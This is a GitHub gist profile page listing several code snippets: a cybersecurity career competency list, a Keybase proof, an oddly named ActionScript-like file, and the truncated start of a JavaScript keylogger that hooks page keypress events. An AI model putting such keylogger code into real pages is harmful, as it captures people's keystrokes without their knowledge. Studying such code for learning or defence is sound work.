Skip to content

Instantly share code, notes, and snippets.

View VictorXLR's full-sized avatar
🏠
Working from home

Victor Popoola VictorXLR

🏠
Working from home
View GitHub Profile
@VictorXLR
VictorXLR / SecStuff
Last active April 10, 2020 23:51
The Arsenal, The Armory & The Libary
++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:
Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)
Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports
Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP mainta
@VictorXLR
VictorXLR / logkey.js
Created January 10, 2020 16:25
Simple Keylogger.js
// get the HTML tag of the page
var obj = document.documentElement
// event listener for keypress
obj.addEventListener('keypress', pushedKey)
// function to be called on keypress
function pushedKey(e) {
var key = e.code
key = key.slice(-1)

Keybase proof

I hereby claim:

  • I am victorxlr on github.
  • I am victorxlr (https://keybase.io/victorxlr) on keybase.
  • I have a public key ASA0U8SgoT8DKqh7ypxLHmG543k4MLdsakPQ3Q-MJGSS0go

To claim this, I am signing this object:

@VictorXLR
VictorXLR / yandere.c
Last active August 28, 2017 22:27
Compiled Code for Creepygirl
package mpPackage {
public class ParaEdit {
public var y:Array;
public var xq934:int;
public var sw382:int;
public var x:Array;
}